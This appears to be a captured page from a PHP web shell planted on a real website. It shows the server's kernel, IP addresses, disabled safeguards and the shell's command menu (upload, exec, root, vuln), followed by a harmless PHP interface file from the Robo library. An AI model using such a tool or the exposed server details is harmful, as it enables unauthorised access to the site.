Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 13.58.161.216 | Time @ Server : 19 Oct 2024 10:25:45
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/firofichi/www/vendor/consolidation/robo/src/Contract/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/firofichi/www/vendor/consolidation/robo/src/Contract/VerbosityThresholdInterface.php

<?php namespace Robo\Contract; use Robo\Contract\OutputAdapterInterface; /** * Record and determine whether the current verbosity level exceeds the * desired threshold level to produce output. */ interface VerbosityThresholdInterface { const VERBOSITY_NORMAL = 1; const VERBOSITY_VERBOSE = 2; const VERBOSITY_VERY_VERBOSE = 3; const VERBOSITY_DEBUG = 4; /** * @param int $verbosityThreshold * * @return $this */ public function setVerbosityThreshold($verbosityThreshold); /** * @return int */ public function verbosityThreshold(); /** * @param \Robo\Contract\OutputAdapterInterface $outputAdapter */ public function setOutputAdapter(OutputAdapterInterface $outputAdapter); /** * @return \Robo\Contract\OutputAdapterInterface */ public function outputAdapter(); /** * @return bool */ public function hasOutputAdapter(); /** * @return int */ public function verbosityMeetsThreshold(); /** * @param string $message */ public function writeMessage($message); }